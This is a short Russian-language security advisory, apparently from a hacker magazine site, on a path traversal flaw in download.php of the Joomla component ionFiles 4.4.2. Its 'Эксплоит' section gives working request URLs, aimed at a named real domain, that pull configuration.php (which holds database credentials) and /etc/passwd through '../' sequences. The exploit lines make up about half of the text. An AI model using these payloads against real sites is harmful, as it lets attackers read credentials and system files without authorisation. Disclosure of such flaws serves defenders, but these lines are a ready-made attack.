Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Joomla Component ionFiles 4.4.2
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный
доступ к конфиденциальной информации на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных сценарием download.php. Атакующий может
получить несанкционированный доступ к содержимому файлов на целевой системе.
Эксплоит:
http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1
http://esecutech.com/components/com_ionfiles/download.php?file=../../configuration.php&download=1
http://esecutech.com/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1